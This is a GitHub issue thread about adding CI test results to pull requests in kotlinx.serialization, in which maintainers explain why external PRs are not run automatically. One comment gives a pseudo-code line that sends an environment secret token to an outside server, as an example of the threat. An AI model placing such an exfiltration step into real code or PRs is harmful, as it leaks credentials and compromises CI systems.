### ISSUE TITLE
Add CI/CD test results in GitHub PRs, so it's easier to see if PRs are valid

### ISSUE THREAD

**Issue by aSemy** [Kotlin/kotlinx.serialization#2161]
**What is your use-case and why do you need this feature?**

When writing PRs for KxS it's often easy to missing running the entire suite of tests for all projects, and it's not practical to expect users can run the tests against all targets. 

Sometimes running all the tests is unnecessary (if I've only edited some JSON logic, I don't need to test the other formats). However, some tests are easy forget to run (for example, the API dump, or updating the Knit tests).

If tests aren't run then this can delay the PR progress. Contributors might not be aware that a test is failing - if a report was visible in the PR then they would be able to fix and act on it independently.

**Describe the solution you'd like**

If possible, the test report from JetBrains' own CI/CD tests was made visible in GitHub. (I'm sure I've seen one JetBrains GitHub project that does this...)

Alternatively, it would be easy + free to set up a GitHub action that would automatically run all tests and checks on all platforms on each PR.

I'm not proposing a requirement that all tests must pass, or the PR is blocked - even if these tests were purely visual and did not actively block merging, it would beneficial.

**Comment by hfhbd** [comment]
Ask ktor team how they enabled the integration. Or just look at the docs: https://www.jetbrains.com/help/teamcity/github.html

**Comment by sandwwraith** [comment]
PR's aren't run automatically mainly for security reasons: what if someone sends a PR with `httpRequest.send("myServer", getEnv("SOME_SENSITIVE_TOKEN"))` and it executes before someone reviews it?

Although it may be possible after carefully reviewing the configuration and checking if no sensitive data is exposed via the environment. cc @qwwdfsad

**Comment by hfhbd** [comment]
I think these are two things: autorunning PRs and integrating the status of TC. The ktor team also runs the PR manually but the status is reported in GitHub

**Comment by sandwwraith** [comment]
Status is reported for external PRs in serialization, too. It won't appear until pipeline is manually launched.

**Comment by hfhbd** [comment]
Oh missed it.
